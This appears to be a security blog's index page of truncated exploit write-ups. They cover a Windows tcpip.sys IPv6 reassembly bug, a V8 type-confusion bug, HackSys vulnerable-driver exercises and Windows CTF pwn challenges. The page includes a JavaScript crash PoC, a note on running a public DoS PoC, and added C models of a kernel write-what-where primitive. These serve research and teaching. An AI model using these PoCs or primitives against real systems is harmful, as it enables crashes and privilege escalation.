CVE-2021-24086: null pointer dereference vulnerability in TCPIP
Information gathering
The patch is in the Ipv6pReassembleDatagram function in tcpip.sys. It adds a bound on the size of one variable so that it can no longer exceed 0xffff,
and the second argument passed to NdisGetDataBuffer further down, BytesNeeded, is no longer truncated to two bytes.
Intuitively this should be a check on a length, but where that length comes from still needs further analysis.
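As an added illustration of the 16-bit truncation the patch removes (this is a constructed model written for this page, not code from the post or from tcpip.sys): the reassembled payload length is accumulated at 32 bits but, before the patch, handed to the buffer fetch as a 16-bit value, modelled here after NdisGetDataBuffer's BytesNeeded argument. The fragment offsets and lengths are assumed values; the real function names and structures are not reproduced.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed model (not tcpip.sys code) of the length handling the patch changes.
 * A reassembler accumulates the total payload length in a 32-bit counter; the
 * consumer, modelled after NdisGetDataBuffer's BytesNeeded parameter, used to
 * receive that value truncated to 16 bits. */

struct frag {
    uint32_t offset;   /* byte offset of the fragment inside the reassembled datagram */
    uint32_t len;      /* fragment payload length in bytes */
};

/* Total reassembled length: the end of whichever fragment reaches furthest. */
static uint32_t total_payload_len(const struct frag *f, size_t n)
{
    uint32_t total = 0;
    for (size_t i = 0; i < n; i++) {
        uint32_t end = f[i].offset + f[i].len;
        if (end > total)
            total = end;
    }
    return total;
}

/* Pre-patch: the length handed to the buffer fetch is silently cut to 16 bits,
 * so a total above 0xffff wraps to a much smaller request. */
static uint32_t bytes_needed_prepatch(uint32_t total)
{
    return (uint16_t)total;
}

/* Post-patch: totals above 0xffff are rejected and the full 32-bit value is passed on. */
static bool bytes_needed_patched(uint32_t total, uint32_t *bytes_needed)
{
    if (total > 0xffff)
        return false;            /* datagram is dropped instead of being reassembled */
    *bytes_needed = total;
    return true;
}

/* Constructed fragment set (assumed values): the IPv6 Fragment header carries a
 * 13-bit offset in 8-byte units, so a fragment may start as far in as byte 65528;
 * a 200-byte fragment there pushes the total past 0xffff. */
static uint32_t example_total(void)
{
    const struct frag frags[] = {
        { 0,     1400 },
        { 65528,  200 },
    };
    return total_payload_len(frags, sizeof frags / sizeof frags[0]);
}

/* true when the patched check would accept a datagram of this total length. */
static bool patched_accepts(uint32_t total)
{
    uint32_t bytes_needed;
    return bytes_needed_patched(total, &bytes_needed);
}

int main(void)
{
    uint32_t total = example_total();
    uint32_t bytes_needed = 0;
    printf("reassembled total     : %u (0x%X)\n", total, total);
    printf("pre-patch BytesNeeded : %u\n", bytes_needed_prepatch(total));
    printf("post-patch accepted   : %s\n",
           bytes_needed_patched(total, &bytes_needed) ? "yes" : "no (dropped)");
    return 0;
}
```

With the constructed fragments the true total is 65728 (0x100C0) while the pre-patch consumer is asked for only 192 bytes; the patched check refuses the datagram outright, which is the behaviour the 0xffff bound in Ipv6pReassembleDatagram introduces.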
Use the public PoC and change iface:
parser.add_argument('--iface', default = "VMware Network Adapter VMnet8")
Then run it; it crashes, with the following crash output:
...
CVE-2021-30517: type confusion vulnerability in V8 IC
Information gathering
The Issue for this CVE is Issue 1203122; it is a type confusion bug. Very helpfully, a PoC is provided as well:
function main() {
  class C {
    m() {
      super.prototype        // property load through super, handled by the IC
    }
  }
  function f() {}
  C.prototype.__proto__ = f  // make the function f the home object's prototype
  let c = new C()
  c.x0 = 1                   // add in-object properties to change the layout
  c.x1 = 1
  c.x2 = 1
  c.x3 = 1
  c.x4 = 0x42424242 / 2      // marker value that is easy to spot in a crash
  f.prototype                // materialise f's prototype before the call
  c.m()
}
for (let i = 0; i < 0x100; ++i) {  // repeat so the IC goes through its states
  main()
}
There is also an EXP:
...
HEVD - Arbitrary Write
Source code
HackSysExtremeVulnerableDriver.h
//
// IOCTL Definitions
//
#define HEVD_IOCTL_ARBITRARY_WRITE IOCTL(0x802)
HackSysExtremeVulnerableDriver.c
/// <summary>
/// IRP Device IoCtl Handler
/// </summary>
/// <param name="DeviceObject">The pointer to DEVICE_OBJECT</param>
/// <param name="Irp">The pointer to IRP</param>
...
HEVD - Buffer Overflow Stack
Source code
HackSysExtremeVulnerableDriver.h
//
// IOCTL Definitions
//
#define HEVD_IOCTL_BUFFER_OVERFLOW_STACK IOCTL(0x800)
HackSysExtremeVulnerableDriver.c
/// <summary>
/// IRP Device IoCtl Handler
/// </summary>
/// <param name="DeviceObject">The pointer to DEVICE_OBJECT</param>
/// <param name="Irp">The pointer to IRP</param>
...
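Added example for both HEVD entries above (Arbitrary Write and Buffer Overflow Stack); this is not HEVD's source and not code from the post. The headers only show IOCTL(0x802) and IOCTL(0x800); HEVD's IOCTL() wrapper builds each as CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS). The block reproduces the CTL_CODE bit layout so it compiles without Windows headers, derives and decodes the two control codes, and models the arbitrary-write handler's write-what-where primitive with a user-mode variable standing in for kernel memory. WRITE_WHAT_WHERE is modelled after HEVD's request struct and the payload value is constructed.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* CTL_CODE layout from the Windows DDK, reproduced so this builds on any platform. */
#define FILE_DEVICE_UNKNOWN 0x22u
#define METHOD_BUFFERED     0u
#define METHOD_IN_DIRECT    1u
#define METHOD_OUT_DIRECT   2u
#define METHOD_NEITHER      3u
#define FILE_ANY_ACCESS     0u

#define CTL_CODE(DeviceType, Function, Method, Access) \
    (((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method))

/* HEVD's IOCTL() wrapper: every one of its codes is METHOD_NEITHER on FILE_DEVICE_UNKNOWN. */
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)

#define HEVD_IOCTL_BUFFER_OVERFLOW_STACK IOCTL(0x800)   /* evaluates to 0x222003 */
#define HEVD_IOCTL_ARBITRARY_WRITE       IOCTL(0x802)   /* evaluates to 0x22200B */

struct ioctl_fields {
    uint32_t device_type;   /* bits 31..16 */
    uint32_t access;        /* bits 15..14 */
    uint32_t function;      /* bits 13..2  */
    uint32_t method;        /* bits  1..0  */
};

/* Split a control code back into its fields (the inverse of CTL_CODE). */
static struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xffffu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xfffu;
    f.method      = code & 0x3u;
    return f;
}

/* METHOD_NEITHER means the I/O manager passes the user buffer pointers through
 * unvalidated (Type3InputBuffer), so the handler must probe them itself. */
static bool passes_raw_user_pointers(uint32_t code)
{
    return decode_ioctl(code).method == METHOD_NEITHER;
}

/* Request layout modelled after HEVD's WRITE_WHAT_WHERE (What/Where pointers). */
typedef struct {
    uint64_t *What;    /* user-controlled source: the value to write */
    uint64_t *Where;   /* user-controlled destination address */
} WRITE_WHAT_WHERE;

/* The write-what-where primitive as the vulnerable handler performs it:
 * one dereference of two attacker-supplied pointers, with no probing. */
static void arbitrary_write_handler(const WRITE_WHAT_WHERE *req)
{
    *req->Where = *req->What;
}

/* User-mode stand-in for the kernel target; returns what landed there. */
static uint64_t demo_arbitrary_write(void)
{
    uint64_t what = 0x4141414141414141ull;   /* constructed payload value */
    uint64_t target = 0;                     /* stands in for the kernel location */
    WRITE_WHAT_WHERE req = { &what, &target };
    arbitrary_write_handler(&req);
    return target;
}

int main(void)
{
    printf("HEVD_IOCTL_BUFFER_OVERFLOW_STACK = 0x%X\n", HEVD_IOCTL_BUFFER_OVERFLOW_STACK);
    printf("HEVD_IOCTL_ARBITRARY_WRITE       = 0x%X\n", HEVD_IOCTL_ARBITRARY_WRITE);
    printf("raw user pointers reach the driver: %s\n",
           passes_raw_user_pointers(HEVD_IOCTL_ARBITRARY_WRITE) ? "yes" : "no");
    printf("target after write-what-where: 0x%llX\n",
           (unsigned long long)demo_arbitrary_write());
    return 0;
}
```

The low two bits of both codes decode to METHOD_NEITHER, which is the security-relevant detail behind each HEVD exercise: the handler receives the user pointers as-is, so any missing ProbeForRead/ProbeForWrite or length check turns directly into the kernel bug the entry is about.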
2019 OGeek - babyheap
Protection check
Results for: .\babyheap.exe
Dynamic Base : "Present"
ASLR : "Present"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation : "Present"
NX : "Present"
SEH : "Present"
CFG : "NotPresent"
RFG : "NotPresent"
SafeSEH : "NotPresent"
GS : "Present"
Authenticode : "NotP ...
2017 HITB GSEC - babyshellcode
Protection check
Results for: .\babyshellcode.exe
Dynamic Base : "Present"
ASLR : "Present"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation : "Present"
NX : "Present"
SEH : "Present"
CFG : "Present"
RFG : "NotPresent"
SafeSEH : "NotPresent"
GS : "Present"
Authenticode : "No ...
2017 Insomnihack - easywin
Protection check
Results for: .\easywin.exe
Dynamic Base : "Present"
ASLR : "Present"
High Entropy VA : "Present"
Force Integrity : "NotPresent"
Isolation : "Present"
NX : "Present"
SEH : "Present"
CFG : "Present"
RFG : "NotPresent"
SafeSEH : "NotApplicable"
GS : "Present"
Authenticode : "NotPrese ...
2017 HITB GSEC - babystack
Protection check
Results for: .\babystack.exe
Dynamic Base : "Present"
ASLR : "Present"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation : "Present"
NX : "Present"
SEH : "Present"
CFG : "Present"
RFG : "NotPresent"
SafeSEH : "NotPresent"
GS : "Present"
Authenticode : "NotPre ...
2020 强网杯 (QWB CTF) - easyoverflow
Protection check
Results for: .\StackOverflow.exe
Dynamic Base : "Present"
ASLR : "Present"
High Entropy VA : "Present"
Force Integrity : "NotPresent"
Isolation : "Present"
NX : "Present"
SEH : "Present"
CFG : "NotPresent"
RFG : "NotPresent"
SafeSEH : "NotApplicable"
GS : "Present"
Authenticode : " ...
PE32 - Advanced stack buffer overflow
Service interaction
SSH connection
ssh -p 2225 app-systeme-ch73@challenge05.root-me.org
app-systeme-ch73
Download the file with SCP
scp -r app-systeme-ch73@challenge05.root-me.org:/challenge/app-systeme/ch73/ch73.exe ./
Challenge analysis
First check the protections:
Results for: .\ch73.exe
Dynamic Base : "NotPresent"
ASLR : "NotPresent"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation : "Present"
NX : "NotPresent"
SEH : "Present ...